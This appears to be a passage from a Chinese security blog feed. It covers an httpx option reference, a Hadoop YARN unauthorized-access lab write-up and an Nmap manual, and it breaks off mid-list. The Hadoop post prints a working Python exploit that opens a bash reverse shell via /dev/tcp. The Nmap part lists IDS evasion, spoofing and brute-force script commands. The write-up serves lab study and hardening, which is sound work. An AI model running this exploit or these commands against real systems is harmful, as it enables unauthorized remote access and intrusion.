<li><code>-rhsts， -respect-hsts</code>   尊重定向请求的HSTS响应头</li>
<li><code>-vhost-input</code>   获取vhost列表作为输入</li>
<li><code>-x string</code>   请求方法探测（get,post等等），使用’all’探测所有HTTP方法</li>
<li><code>-body string</code>    在HTTP请求中包含的参数消息体 “ value&#x3D;value&amp;value&#x3D;value”</li>
<li><code>-s， -stream stream mode</code>   ，  流模式，开始详细说明输入目标而不进行排序</li>
<li><code>-sd， -skip-dedupe</code>   禁用重复数据删除输入项(仅用于流模式)</li>
<li><code>-ldp, -leave-default-ports</code>    在主机头保留默认的 http&#x2F;https 端口(例如 <a href="http://host/">http://host</a>: 80- <a href="https://host/">https://host:443</a>)</li>
<li><code>-ztls</code>   ， 使用ztls库并自动回调到tls13的标准库</li>
<li><code>-no-decode</code>，避免解码body</li>
<li><code>-tlsi, -tls-impersonate</code>  ，启用实验客户端hello（ja3）tls随机化</li>
<li><code>-no-stdin</code>  ， 禁用 Stdin 处理</li>
</ul>
<h3 id="DEBUG-🤪"><a href="#DEBUG-🤪" class="headerlink" title="DEBUG 🤪"></a>DEBUG 🤪</h3><ul>
<li><code>-health-check, -hc</code>  进行诊断检查</li>
<li><code>-debug</code>   在cli中显示请求&#x2F;响应内容</li>
<li><code>-debug-req</code> 在 cli 中显示请求内容</li>
<li><code>-debug-resp</code> 在 cli 中显示返回内容</li>
<li><code>-version</code>  显示 httpx 版本</li>
<li><code>-stats</code> ， 显示扫描统计</li>
<li><code>-profile-mem string</code>   ，可选的HTTPX内存配置文件转储文件</li>
<li><code>-silent</code> ，静默模式（不显示httpx程序banner信息）</li>
<li><code>-v, -verbose</code> ， 详细模式</li>
<li><code>-si, -stats-interval int</code> ，显示统计数据更新之间等待的秒数(默认值: 5)</li>
<li><code>-nc, -no-color</code> ，禁用cli输出中的颜色</li>
</ul>
<h3 id="优化-🙄"><a href="#优化-🙄" class="headerlink" title="优化 🙄"></a>优化 🙄</h3><ul>
<li><code>-nf, -no-fallback</code> 显示 http 与 https 两种协议探测</li>
<li><code>-nfs, -no-fallback-scheme</code> ，使用输入目标中指定的协议方案进行探测</li>
<li><code>-maxhr, -max-host-error int</code> ，跳过剩余路径之前，每个主机的最大错误计数（默认30）</li>
<li><code>-ec, -exclude-cdn</code>  ， 针对waf&#x2F;cdn 跳过全端口扫描，只检查80和443</li>
<li><code>-eph, -exclude-private-hosts</code> ，跳过任何具有私有IP地址的主机（如 localhost）</li>
<li><code>-retries int</code>  ， 重试次数</li>
<li><code>-timeout int</code> ，以秒为单位的超时(默认值为10)</li>
<li><code>-delay value</code> ，每个http请求之间的持续时间（例如：200ms，1s）（默认值为-1ns）</li>
<li><code>-rsts, -response-size-to-save int</code> ，要保存的最大响应大小（以字节为单位）（默认值为2147483647）</li>
<li><code>-rstr, -response-size-to-read int</code>  ，要读取的最大响应大小（以字节为单位）（默认值为2147483647）</li>
</ul>
<h1 id="😰-使用技巧"><a href="#😰-使用技巧" class="headerlink" title="😰 使用技巧"></a>😰 使用技巧</h1><figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">cat 一个文件进行测试</span><br><span class="line">cat hosts.<span class="property">txt</span> | httpx</span><br><span class="line"></span><br><span class="line">指定文件进行测试</span><br><span class="line">httpx -list hosts.<span class="property">txt</span> </span><br><span class="line"></span><br><span class="line"><span class="variable constant_">CIDR</span>输入测试</span><br><span class="line">echo <span class="number">173.0</span><span class="number">.84</span><span class="number">.0</span>/<span class="number">24</span> | httpx </span><br><span class="line"></span><br><span class="line"><span class="variable constant_">AS</span>编号测试</span><br><span class="line">echo <span class="title class_">AS14421</span> | httpx -silent</span><br><span class="line"></span><br><span class="line">管道工具链测试</span><br><span class="line">subfinder -d hackerone.<span class="property">com</span> | httpx</span><br><span class="line"></span><br><span class="line">工具链查找网站图标</span><br><span class="line">subfinder -d hackerone.<span class="property">com</span> -silent | httpx -favicon</span><br><span class="line"></span><br><span class="line">指纹识别</span><br><span class="line">subfinder -d hackerone.<span class="property">com</span> -silent | httpx -jarm</span><br><span class="line">subfinder -d hackerone.<span class="property">com</span> -silent | httpx -asn</span><br><span class="line"></span><br><span class="line">文件/路径暴力破解</span><br><span class="line">httpx -l urls.<span class="property">txt</span> -path /v1/api -sc</span><br><span class="line"></span><br><span class="line">docker 运行</span><br><span class="line">cat sub_domains.<span class="property">txt</span> | docker run -i projectdiscovery/httpx</span><br><span class="line"></span><br><span class="line">批量截图</span><br><span class="line">subfinder -d example.<span class="property">com</span> | httpx -screenshot</span><br></pre></td></tr></table></figure>

<h1 id="😬-参考文章"><a href="#😬-参考文章" class="headerlink" title="😬 参考文章"></a>😬 参考文章</h1><ul>
<li><a href="https://github.com/projectdiscovery/httpx">https://github.com/projectdiscovery/httpx</a></li>
</ul>
<h1 id="🥹-over-。-。-。-。"><a href="#🥹-over-。-。-。-。" class="headerlink" title="🥹 over.  。 。  。   。"></a>🥹 over.  。 。  。   。</h1><h1 id="🥹-over-。-。-。-。-1"><a href="#🥹-over-。-。-。-。-1" class="headerlink" title="🥹 over.  。 。  。   。"></a>🥹 over.  。 。  。   。</h1><h1 id="🥹-over-。-。-。-。-2"><a href="#🥹-over-。-。-。-。-2" class="headerlink" title="🥹 over.  。 。  。   。"></a>🥹 over.  。 。  。   。</h1></div></div></div>

<div class="note red icon-padding modern"><i class="note-icon fas fa-fan"></i><p>啊，再见了，再见了，哈</p>
</div>

<div class="note orange icon-padding modern"><i class="note-icon fas fa-battery-half"></i><p>我们会再见的对么</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fas fa-bullhorn"></i><p>再见你要幸福</p>
</div>

<div class="note purple icon-padding modern"><i class="note-icon far fa-hand-scissors"></i><p>燕子，燕子</p>
</div>

]]></content>
      <categories>
        <category>tool</category>
        <category>Httpx</category>
      </categories>
      <tags>
        <tag>HTTPX</tag>
        <tag>Tools</tag>
      </tags>
  </entry>
  <entry>
    <title>Hadoop 未授权访问</title>
    <url>/2023/05/17/Hadoop/</url>
    <content><![CDATA[<div class="note red icon-padding modern"><i class="note-icon fas fa-fan"></i><p>学习记录</p>
</div>

<div class="note orange icon-padding modern"><i class="note-icon fas fa-battery-half"></i><p>安全小技巧</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fas fa-bullhorn"></i><p>新的一年快到了….</p>
</div>

<div class="note purple icon-padding modern"><i class="note-icon far fa-hand-scissors"></i><p>剪刀石头布,哈，我又赢了 </p>
</div>

<div class="timeline orange"><div class='timeline-item headline'><div class='timeline-item-title'><div class='item-circle'><p>2023</p>
</div></div></div><div class='timeline-item'><div class='timeline-item-title'><div class='item-circle'><p>05-17</p>
</div></div><div class='timeline-item-content'><h1 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h1><p>由于服务器直接在开放了 Hadoop 机器 的多个 web 端口及部分默认服务端口，黑客可以通过命令行操作多个目录下的数据，如进行删除，下载，目录浏览甚至命令执行等操作，产生极大的危害。</p>
<p>ResourceManager 默认端口8088   </p>
<h1 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h1><p>使用 vulhub 搭建靶场环境</p>
<p>地址：<a href="https://vulhub.org/#/environments/hadoop/unauthorized-yarn/">https://vulhub.org/#/environments/hadoop/unauthorized-yarn/</a></p>
<p>下载环境，进入漏洞环境目录执行：<code>docker-compose up -d</code> 启动安装启动环境</p>
<p>环境启动后，访问<code>http://your-ip:8088</code>即可看到Hadoop YARN ResourceManager WebUI页面。</p>
<h1 id="漏洞原理"><a href="#漏洞原理" class="headerlink" title="漏洞原理"></a>漏洞原理</h1><p>调用 New Application API 创建 Application 进行代码注入，反弹shell。</p>
<h1 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h1><ul>
<li>启动 msfconsole</li>
<li>search hadoop</li>
<li>use linux&#x2F;http&#x2F;hadoop_unauth_exec</li>
<li>设置目标ip，本地监听ip</li>
<li>exploit</li>
</ul>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">py poc 代码</span><br><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"></span><br><span class="line">import requests</span><br><span class="line"></span><br><span class="line">target = <span class="string">&#x27;http://127.0.0.1:8088/&#x27;</span></span><br><span class="line">lhost = <span class="string">&#x27;192.168.0.1&#x27;</span> <span class="comment"># put your local host ip here, and listen at port 9999</span></span><br><span class="line"></span><br><span class="line">url = target + <span class="string">&#x27;ws/v1/cluster/apps/new-application&#x27;</span></span><br><span class="line">resp = requests.post(url)</span><br><span class="line">app_id = resp.json()[<span class="string">&#x27;application-id&#x27;</span>]</span><br><span class="line">url = target + <span class="string">&#x27;ws/v1/cluster/apps&#x27;</span></span><br><span class="line">data = &#123;</span><br><span class="line">    <span class="string">&#x27;application-id&#x27;</span>: app_id,</span><br><span class="line">    <span class="string">&#x27;application-name&#x27;</span>: <span class="string">&#x27;get-shell&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;am-container-spec&#x27;</span>: &#123;</span><br><span class="line">        <span class="string">&#x27;commands&#x27;</span>: &#123;</span><br><span class="line">            <span class="string">&#x27;command&#x27;</span>: <span class="string">&#x27;/bin/bash -i &gt;&amp; /dev/tcp/%s/9999 0&gt;&amp;1&#x27;</span> % lhost,</span><br><span class="line">        &#125;,</span><br><span class="line">    &#125;,</span><br><span class="line">    <span class="string">&#x27;application-type&#x27;</span>: <span class="string">&#x27;YARN&#x27;</span>,</span><br><span class="line">&#125;</span><br><span class="line">requests.post(url, json=data)</span><br></pre></td></tr></table></figure>

<h1 id="漏洞加固"><a href="#漏洞加固" class="headerlink" title="漏洞加固"></a>漏洞加固</h1><ul>
<li>关闭hadoop web 管理页面</li>
<li>开启身份验证，防止未授权用户访问</li>
<li>设置防火墙安全组策略，禁止端口公网访问，限制可信ip</li>
</ul>
<h1 id="参考地址"><a href="#参考地址" class="headerlink" title="参考地址"></a>参考地址</h1><p><a href="https://vulhub.org/#/environments/hadoop/unauthorized-yarn/">https://vulhub.org/#/environments/hadoop/unauthorized-yarn/</a></p>
<p><a href="https://paper.seebug.org/409/#0x08-hadoop">https://paper.seebug.org/409/#0x08-hadoop</a></p>
</div></div></div>

<div class="note red icon-padding modern"><i class="note-icon fas fa-fan"></i><p>啊，再见了，再见了，哈</p>
</div>

<div class="note orange icon-padding modern"><i class="note-icon fas fa-battery-half"></i><p>我们会再见的对么</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fas fa-bullhorn"></i><p>再见你要幸福</p>
</div>

<div class="note purple icon-padding modern"><i class="note-icon far fa-hand-scissors"></i><p>燕子，燕子</p>
</div>

]]></content>
      <categories>
        <category>未授权访问</category>
        <category>Hadoop</category>
      </categories>
      <tags>
        <tag>Hadoop</tag>
      </tags>
  </entry>
  <entry>
    <title>Nmap-参考手册</title>
    <url>/2023/11/26/Nmap-Reference/</url>
    <content><![CDATA[<div class="note red icon-padding flat"><i class="note-icon fas fa-fan"></i><p>奇奇怪怪</p>
</div>

<div class="note orange icon-padding flat"><i class="note-icon fas fa-battery-half"></i><p>安全小技巧</p>
</div>

<div class="note blue icon-padding flat"><i class="note-icon fas fa-bullhorn"></i><p>新的一天开始了</p>
</div>

<div class="note purple icon-padding flat"><i class="note-icon far fa-hand-scissors"></i><p>剪刀石头布,哈，我又赢了 </p>
</div>

<div class="timeline blue"><div class='timeline-item headline'><div class='timeline-item-title'><div class='item-circle'><p>2023</p>
</div></div></div><div class='timeline-item'><div class='timeline-item-title'><div class='item-circle'><p>11-26</p>
</div></div><div class='timeline-item-content'><p>永远新的开始啊</p>
<p><strong><strong><strong><strong><strong><strong>目录列表</strong></strong></strong></strong></strong></strong></p>
<hr>
<p>👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻👻</p>
<h1 id="简介-🤩"><a href="#简介-🤩" class="headerlink" title="简介 🤩"></a><strong>简介 🤩</strong></h1><p><strong>Nmap 使用手册</strong></p>
<p><strong>Nmap（Network Mapper）是一个用于网络探索和安全审计的开源工具。它被设计为快速扫描大型网络，尽管它对单个主机工作得很好。</strong></p>
<h1 id="参数说明-🤔"><a href="#参数说明-🤔" class="headerlink" title="参数说明 🤔"></a><strong>参数说明 🤔</strong></h1><ul>
<li><strong>-sL  列表扫描，扫描ip地址并且进行返现dns查找，主机发现（除非指定了 <code>-n</code> ）</strong></li>
<li><strong>-n 不进行dns解析</strong></li>
<li><strong>-R 所有目标dns解析</strong></li>
<li><strong>-sS SYN扫描，SYN扫描是默认的扫描类型</strong></li>
<li><strong>-p- 扫描全部端口，默认情况下只扫描1,000个常见端口</strong></li>
<li><strong>-PA ACK 扫描主机发现</strong></li>
<li><strong>-PS80,443 SYN 扫描主机发现</strong></li>
<li><strong>-PU UDP扫描主机发现</strong></li>
<li><code>**-PE -PP -PS80,443 -PA3389 -PU40125</code>  ping扫描，主机发现技术**</li>
<li><code>**-Pn</code> 跳过识别主机是否存活，扫描所有，很慢**</li>
<li><strong>-A 它相当于 <code>-sV</code> <code>-sC</code> <code>-O</code> <code>--traceroute</code> （版本检测、带有默认脚本集的Nmap脚本引擎、远程操作系统检测和traceroute）</strong></li>
<li><strong>-T 1 2 3 4 5 设置时间，越高越快，网络稳定的情况下可以尝试最大值</strong></li>
<li><strong>-oA filename-%D  扫描结果输出所有格式，文件名-时间格式，扩展名分别可为.nmap、.xml和.gnmap</strong></li>
<li><strong>-O os操作系统探测</strong></li>
<li><strong>-sn 关闭端口扫描</strong></li>
<li><strong>-sV 版本服务检测</strong></li>
<li><strong>-sC 使用默认脚本探测</strong></li>
<li><strong>参数排序</strong></li>
<li><strong>-iL  filename 指定主机列表文件</strong></li>
<li><strong>-iR <num Hosts>：选择随机目标</strong></li>
<li><code>**--exclude</code>  127.0.0.1 排除ip**</li>
<li><code>**--excludefile</code> filename  排除ip列表文件**</li>
<li><strong>主机发现：</strong></li>
<li><strong>-sn：Ping 扫描 - 禁用端口扫描</strong></li>
<li><strong>-Pn：将所有主机视为在线–跳过主机发现</strong></li>
<li><strong>-PS&#x2F;PA&#x2F;PU&#x2F;PY[端口列表]：给定端口的 TCP SYN&#x2F;ACK、UDP 或 SCTP 发现</strong></li>
<li><strong>-PE&#x2F;PP&#x2F;PM：ICMP 回显、时间戳和网络掩码请求发现探测</strong></li>
<li><strong>-PO[协议列表]：IP协议Ping</strong></li>
<li><strong>-n&#x2F;-R：从不进行 DNS 解析&#x2F;始终解析 [默认值：有时]</strong></li>
<li><strong>–dns-servers &lt;serv1[,serv2],…&gt;: 指定自定义 DNS 服务器</strong></li>
<li><strong>–system-dns：使用操作系统的 DNS 解析器</strong></li>
<li><strong>–traceroute：跟踪每个主机的跃点路径</strong></li>
<li><strong>扫描技术：</strong></li>
<li><strong>-sS&#x2F;sT&#x2F;sA&#x2F;sW&#x2F;sM：TCP SYN&#x2F;Connect()&#x2F;ACK&#x2F;Window&#x2F;Maimon 扫描</strong></li>
<li><strong>-sU：UDP扫描</strong></li>
<li><strong>-sN&#x2F;sF&#x2F;sX：TCP Null、FIN 和 Xmas 扫描</strong></li>
<li><strong>–scanflags <flags>: 自定义 TCP 扫描标志  ,<code>URGACKPSHRSTSYNFIN</code> 指定所有协议</strong></li>
<li><strong>-sI &lt;僵尸主机[:probeport]&gt;：空闲扫描</strong></li>
<li><strong>-sY&#x2F;sZ：SCTP INIT&#x2F;COOKIE-ECHO 扫描</strong></li>
<li><strong>-sO：IP协议扫描</strong></li>
<li><strong>-b &lt;FTP中继主机&gt;：FTP反弹扫描</strong></li>
<li><strong>端口规格和扫描顺序：</strong></li>
<li><strong>-p &lt;端口范围&gt;：仅扫描指定端口<br>   例如：-p22；  -p1-65535；  -p U:53,111,137,T:21-25,80,139,8080,S:9</strong></li>
<li><strong>–exclude-ports &lt;端口范围&gt;：从扫描中排除指定端口</strong></li>
<li><strong>-F：快速模式 - 扫描比默认扫描更少的端口</strong></li>
<li><strong>-r：按顺序扫描端口 - 不要随机化</strong></li>
<li><strong>–top-ports <number>: 扫描 <number> 个最常见端口</strong></li>
<li><strong>–port-ratio <ratio>：扫描比<ratio>更常见的端口</strong></li>
<li><code>**--allports</code> （不排除任何端口进行版本检测）**</li>
<li><strong>服务&#x2F;版本检测：</strong></li>
<li><strong>-sV：探测开放端口以确定服务&#x2F;版本信息</strong></li>
<li><strong>–version-intensity <level>: 设置从 0 (light) 到 9 (尝试所有探针)</strong></li>
<li><strong>–version-light：限制最有可能的探测（强度 2）</strong></li>
<li><strong>–version-all：尝试每个探针（强度 9）</strong></li>
<li><strong>–version-trace：显示详细的版本扫描活动（用于调试）</strong></li>
<li><strong>脚本扫描：</strong></li>
<li><strong>-sC：相当于–script&#x3D;default</strong></li>
<li><strong>–script&#x3D;&lt;Lua 脚本&gt;: &lt;Lua 脚本&gt; 是逗号分隔的列表、目录、脚本文件或脚本类别</strong></li>
<li><strong>–script-args&#x3D;&lt;n1&#x3D;v1,[n2&#x3D;v2,…]&gt;: 为脚本提供参数</strong></li>
<li><strong>–script-args-file&#x3D;文件名：在文件中提供 NSE 脚本参数</strong></li>
<li><strong>–script-trace：显示发送和接收的所有数据</strong></li>
<li><strong>–script-updatedb：更新脚本数据库。</strong></li>
<li><strong>–script-help&#x3D;&lt;Lua 脚本&gt;：显示有关脚本的帮助。 <Lua scripts> 是一个以逗号分隔的脚本文件列表或脚本类别。</strong></li>
<li><strong>操作系统检测：</strong></li>
<li><strong>-O：启用操作系统检测</strong></li>
<li><strong>–osscan-limit：将操作系统检测限制为有希望的目标</strong></li>
<li><strong>–osscan-guess：更积极地猜测操作系统</strong></li>
<li><strong>时间设置</strong></li>
</ul>
<p><strong>需要<time>的选项以秒为单位，或附加“ms”（毫秒），<br>   ‘s’（秒）、’m’（分钟）或’h’（小时）到值（例如30m）</strong></p>
<ul>
<li><strong>-T&lt;0-5&gt;：设置计时模板（越高越快）</strong></li>
<li><strong>–min-hostgroup&#x2F;max-hostgroup <size>：并行主机扫描组大小，max最大256</strong></li>
<li><strong>–min-parallelism&#x2F;max-parallelism <numprobes>：最大256 探测并行化</strong></li>
<li><strong>–min-rtt-timeout&#x2F;max-rtt-timeout&#x2F;initial-rtt-timeout &lt;时间&gt;：指定探头往返时间，延时。Nmap等待端口扫描探测响应的最短、最长和初始时间。</strong></li>
<li><strong>–max-retries <tries>：端口扫描探测重传次数的上限。</strong></li>
<li><strong>–host-timeout &lt;时间&gt;：经过这么长时间后放弃目标，默认5分钟</strong></li>
<li><strong>–scan-delay&#x2F;–max-scan-delay &lt;时间&gt;：调整探头之间的延迟，默认10s</strong></li>
<li><strong>–min-rate <number>: 每秒发送数据包的速度不低于<number></strong></li>
<li><strong>–max-rate <number>: 每秒发送数据包的速度不超过 <number></strong></li>
<li><strong>防火墙&#x2F;IDS 规避和欺骗：</strong></li>
<li><code>**-f</code> （片段数据包）; <code>--mtu</code> （使用指定的MTU）这个想法是将TCP报头分割成几个数据包，使数据包过滤器，入侵检测系统和其他入侵检测系统更难检测到您正在做什么。小心点！**</li>
<li><strong>-D &lt;decoy1,decoy2[,ME],…&gt;：用诱饵隐藏扫描</strong></li>
<li><strong>-S <IP_Address>：欺骗源地址</strong></li>
<li><strong>-e <iface>：使用指定的接口</strong></li>
<li><strong>-g&#x2F;–source-port <portnum>：使用给定的端口号</strong></li>
<li><strong>–proxies &lt;url1,[url2],…&gt;: 通过 HTTP&#x2F;SOCKS4 代理中继连接</strong></li>
<li><strong>–data &lt;十六进制字符串&gt;：将自定义负载附加到发送的数据包中</strong></li>
<li><strong>–data-string <string>：将自定义 ASCII 字符串附加到发送的数据包中</strong></li>
<li><strong>–data-length <num>：将随机数据附加到发送的数据包中</strong></li>
<li><strong>–ip-options <options>: 发送带有指定ip选项的数据包</strong></li>
<li><strong>–ttl <val>: 设置IP生存时间字段</strong></li>
<li><strong>–spoof-mac &lt;mac 地址&#x2F;前缀&#x2F;供应商名称&gt;: 欺骗您的 MAC 地址</strong></li>
<li><strong>–badsum：发送带有伪造 TCP&#x2F;UDP&#x2F;SCTP 校验和的数据包</strong></li>
<li><strong>输出扫描结果：</strong></li>
<li><strong>-oN&#x2F;-oX&#x2F;-oS&#x2F;-oG &lt;文件&gt;：以正常、XML、s|&lt;rIpt kIddi3 输出扫描，和 Grepable 格式分别为给定的文件名。</strong></li>
<li><strong>-oA <basename>：同时以三种主要格式输出</strong></li>
<li><strong>-v：增加详细级别（使用-vv或更多以获得更好的效果）</strong></li>
<li><strong>-d：提高调试级别（使用-dd或更多以获得更好的效果）</strong></li>
<li><strong>–reason：显示端口处于特定状态的原因</strong></li>
<li><strong>–open：仅显示开放（或可能开放）的端口</strong></li>
<li><strong>–packet-trace：显示发送和接收的所有数据包</strong></li>
<li><strong>–iflist：打印主机接口和路由（用于调试）</strong></li>
<li><strong>–append-output：附加到而不是破坏指定的输出文件</strong></li>
<li><strong>–resume &lt;文件名&gt;：恢复中止的扫描</strong></li>
<li><strong>–noninteractive：通过键盘禁用运行时交互</strong></li>
<li><strong>–stylesheet &lt;path&#x2F;URL&gt;：用于将 XML 输出转换为 HTML 的 XSL 样式表</strong></li>
<li><strong>–webxml：来自 Nmap.Org 的参考样式表，以获得更可移植的 XML</strong></li>
<li><strong>–no-stylesheet：防止 XSL 样式表与 XML 输出关联</strong></li>
<li><strong>其他：</strong></li>
<li><strong>-6：启用 IPv6 扫描</strong></li>
<li><strong>-A：启用操作系统检测、版本检测、脚本扫描和traceroute</strong></li>
<li><strong>–datadir <dirname>: 指定自定义 Nmap 数据文件位置</strong></li>
<li><strong>–send-eth&#x2F;–send-ip：使用原始以太网帧或 IP 数据包发送</strong></li>
<li><strong>–privileged：假设用户具有完全特权</strong></li>
<li><strong>–unprivileged：假设用户缺乏原始套接字权限</strong></li>
<li><strong>–resolve-all选项：当主机名被指定为目标时，它通过域名系统（DNS）解析以确定要扫描的IP地址。如果名称解析为多个IP地址，则只扫描第一个。要让Nmap扫描所有解析的地址，而不仅仅是第一个，请使用 –resolve-all 选项。</strong></li>
<li><code>**--unique</code> （每个地址只扫描一次）**</li>
</ul>
<h1 id="使用技巧-😀"><a href="#使用技巧-😀" class="headerlink" title="使用技巧 😀"></a><strong>使用技巧 😀</strong></h1><h2 id="主机发现"><a href="#主机发现" class="headerlink" title="主机发现"></a><strong>主机发现</strong></h2><ul>
<li><strong>nmap -sn -T4 <a href="http://www.lwn.net/24">www.lwn.net/24</a>  快速扫描指定域名C段</strong></li>
<li><strong>nmap -PE  最佳主机发现参数</strong></li>
<li><strong>-PE -PS80 -PS443 -PP -PU40125 -PS3389 -PA21 -PU161 –source-port 53  最佳主机发现组合</strong></li>
<li><strong>-PE -PA80 -PS443 -PP -PU40125 –source-port 53   最佳主机发现组合精简</strong></li>
<li><strong>最佳TCP端口选择，80,443,113,21，23,25,53,22,110,3389,8080，1723</strong></li>
<li><strong>最佳UDP端口选择，53,161</strong></li>
<li><strong>-PE -PP -PS21,22,23,25,80,113,443,31339 -PA80,113,443,10042 –source-port 53 组合推荐</strong></li>
</ul>
<h2 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a><strong>端口扫描</strong></h2><ul>
<li><strong>最常见TCP端口，80,23,443,21,22,25,3389,110,445,139,143,53,135,3306,8080,1723,111,993,5900</strong></li>
<li><strong>最常见UDP端口，631,161,137,123,138,1434,445,135,67,53,139,500,68，520,1900,4500,514,49152,162,69</strong></li>
</ul>
<h2 id="优化参数"><a href="#优化参数" class="headerlink" title="优化参数"></a><strong>优化参数</strong></h2><ul>
<li><code>**F</code>：快速扫描。只对常见端口进行扫描，而不是对所有的65535个端口进行扫描。**</li>
<li><code>**T</code>参数：用于设置扫描的速度&#x2F;侦察级别。<code>T5</code>是最快的扫描速度，而<code>T0</code>则是最慢的扫描速度。**</li>
<li><code>**-min-rate</code>和<code>-max-retries</code>参数：可以控制nmap发送探测包的速率和重试次数，进而影响扫描的速度。**</li>
<li><code>**-host-timeout</code>参数：可以设置主机超时时间，当一个主机长时间没有响应时，nmap会跳过该主机，从而加快扫描速度。**</li>
</ul>
<h2 id="Nmap-脚本"><a href="#Nmap-脚本" class="headerlink" title="Nmap 脚本"></a><strong>Nmap 脚本</strong></h2><ul>
<li><a href="https://nmap.org/nsedoc/lib/">**https://nmap.org/nsedoc/lib/</a>  脚本库**</li>
<li><a href="https://nmap.org/nsedoc/scripts/">**https://nmap.org/nsedoc/scripts/</a>  nmap 官方 600+脚本介绍**</li>
<li><a href="https://nmap.org/nsedoc/scripts/dns-zone-transfer.html">**https://nmap.org/nsedoc/scripts/dns-zone-transfer.html</a>  dns区域传输**</li>
<li><code>**-sC</code>   它相当于 <code>--script=default</code>**</li>
<li><strong>nmap –script  scriptname</strong></li>
<li><code>**--script-updatedb</code>  更新脚本数据库**</li>
<li><code>**--script-args *&lt;n1&gt;*=*&lt;v1&gt;*,*&lt;n2&gt;*={*&lt;n3&gt;*=*&lt;v3&gt;*},*&lt;n4&gt;*={*&lt;v4&gt;*,*&lt;v5&gt;*}</code>  设置脚本参数**</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">**nmap --script dns-zone-transfer.nse \</span><br><span class="line">     --script-args dns-zone-transfer.domain=&lt;domain&gt;**</span><br></pre></td></tr></table></figure>

<ul>
<li><a href="https://nmap.org/nsedoc/scripts/firewall-bypass.html">**https://nmap.org/nsedoc/scripts/firewall-bypass.html</a>  防火墙绕过**</li>
</ul>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">**nmap --script firewall-bypass &lt;target&gt;</span><br><span class="line">nmap --script firewall-bypass --script-args firewall-bypass.<span class="property">helper</span>=<span class="string">&quot;ftp&quot;</span>, firewall-bypass.<span class="property">targetport</span>=<span class="number">22</span> &lt;target&gt;**</span><br></pre></td></tr></table></figure>

<ul>
<li><code>**nmap --script ftp-brute -p 21 &lt;host&gt;</code>    ftp爆破**</li>
<li><code>**nmap --script hostmap-bfk --script-args hostmap-bfk.prefix=hostmap- &lt;targets&gt;</code>  通过查询<a href="http://www.bfk.de/bfk_dnslogger.html%E4%B8%8A%E7%9A%84%E8%81%94%E6%9C%BA%E6%95%B0%E6%8D%AE%E5%BA%93%EF%BC%8C%E5%8F%91%E7%8E%B0%E8%A7%A3%E6%9E%90%E4%B8%BA%E7%9B%AE%E6%A0%87IP%E5%9C%B0%E5%9D%80%E7%9A%84%E4%B8%BB%E6%9C%BA%E5%90%8D%E3%80%82">http://www.bfk.de/bfk_dnslogger.html上的联机数据库，发现解析为目标IP地址的主机名。</a>**</li>
<li><strong>crt证书透明子域名查询</strong></li>
</ul>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line"></span><br><span class="line">**nmap --script hostmap-crtsh --script-args <span class="string">&#x27;hostmap-crtsh.prefix=hostmap-&#x27;</span> &lt;targets&gt;</span><br><span class="line">nmap -sn --script hostmap-crtsh &lt;target&gt;</span><br><span class="line">通过查询<span class="title class_">Google</span>的证书透明度日志数据库（<span class="attr">https</span>:<span class="comment">//crt.sh）查找Web服务器的子域。**</span></span><br></pre></td></tr></table></figure>

<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">**实用脚本集合</span><br><span class="line">通过查询<span class="attr">http</span>:<span class="comment">//ip.robtex.com/上的在线Robtex服务，发现解析为目标IP地址的主机名。</span></span><br><span class="line">nmap --script hostmap-robtex -sn -<span class="title class_">Pn</span> scanme.<span class="property">nmap</span>.<span class="property">org</span></span><br><span class="line"></span><br><span class="line">搜索网站并尝试识别已发现文件的备份副本。它通过请求一些不同的文件名组合（例如，index.<span class="property">bak</span>、index.<span class="property">html</span>~、index.<span class="property">html</span>的副本）。</span><br><span class="line">nmap --script=http-backup-finder &lt;target&gt;</span><br><span class="line"></span><br><span class="line">对http basic、digest和ntlm身份验证执行强力密码审核。</span><br><span class="line">nmap --script http-brute -p <span class="number">80</span> &lt;host&gt;</span><br><span class="line"></span><br><span class="line">从<span class="variable constant_">HTTP</span>响应中提取并输出<span class="variable constant_">HTML</span>和<span class="title class_">JavaScript</span>注释。</span><br><span class="line">nmap -p80 --script http-comments-displayer.<span class="property">nse</span> &lt;host&gt;</span><br><span class="line"></span><br><span class="line">检查通用内容管理系统和<span class="title class_">Web</span>服务器配置文件的备份和交换文件。</span><br><span class="line">nmap --script=http-config-backup &lt;target&gt;</span><br><span class="line"></span><br><span class="line">使用各种<span class="title class_">Web</span>应用程序和设备使用的默认凭据测试访问。</span><br><span class="line">nmap -p80 --script http-<span class="keyword">default</span>-accounts host/ip</span><br><span class="line"></span><br><span class="line">通过将<span class="title class_">User</span>-<span class="title class_">Agent</span>更改为“secret”值来检测某些D-<span class="title class_">Link</span>路由器上的固件后门。使用“秘密”<span class="title class_">User</span>-<span class="title class_">Agent</span>绕过身份验证，并允许管理员访问路由器。</span><br><span class="line">nmap -sV --script http-dlink-backdoor &lt;target&gt;</span><br><span class="line"></span><br><span class="line">枚举流行的<span class="title class_">Web</span>应用程序和服务器使用的目录。</span><br><span class="line">nmap -sV --script=http-enum &lt;target&gt;</span><br><span class="line"></span><br><span class="line">利用<span class="title class_">Web</span>应用程序中不安全的文件上传表单，使用各种技术，如更改<span class="title class_">Content</span>-type头或创建包含注释中有效负载的有效图像文件。</span><br><span class="line">nmap -p80 --script http-fileupload-exploiter.<span class="property">nse</span> &lt;target&gt;</span><br><span class="line"></span><br><span class="line">对基于http表单的身份验证执行强力密码审核。</span><br><span class="line">nmap --script http-form-brute -p <span class="number">80</span> &lt;host&gt;</span><br><span 